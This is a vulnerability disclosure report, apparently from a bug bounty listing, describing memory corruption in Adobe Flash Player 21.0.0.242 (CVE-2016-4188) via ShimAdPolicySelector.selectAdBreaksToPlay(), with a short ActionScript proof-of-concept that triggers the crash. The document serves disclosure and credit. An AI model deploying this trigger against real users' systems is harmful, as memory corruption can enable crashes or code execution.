Hhj4ckH1:151040Internet Bug Bounty: Adobe Flash Player ShimAdPolicySelector(adPolicySelectorType=0) class Memory Corruption
EPSS
Percentile
86.7%
I. Summary
Adobe Flash Player is prone to a vulnerability which leads to memory corruption because of improper validation of ShimAdPolicySelector.selectAdBreaksToPlay().
II. Description
Normally, selectAdBreaksToPlay() should validate its parameter returns error in AS3 level if anything goes wrong.
However, if ShimAdPolicySelector is constructed with adPolicySelectorType=0, then invoking selectAdBreaksToPlay() with invalid AdPolicyInfo instance, some inner fields of ShimAdPolicySelector will be absent, which will cause a memory crash.
POC Source Code:
package
{
import com.adobe.tvsdk.mediacore.MediaPlayerItem;
import com.adobe.tvsdk.mediacore.timeline.advertising.policy.AdPolicyInfo;
import com.adobe.tvsdk.mediacore.timeline.advertising.policy.ShimAdPolicySelector;
import flash.display.Sprite;
public class poc extends Sprite
{
public function poc()
{
var mp:MediaPlayerItem;
var ap:AdPolicyInfo;
var obj:ShimAdPolicySelector = new ShimAdPolicySelector(0,mp);
obj.selectAdBreaksToPlay(ap);
}
}
}
III. Impact
Memory Corruption
IV. Affected
Adobe Flash Player 21.0.0.242.
V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.
It has been assigned as CVE-2016-4188 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-25.html
Related
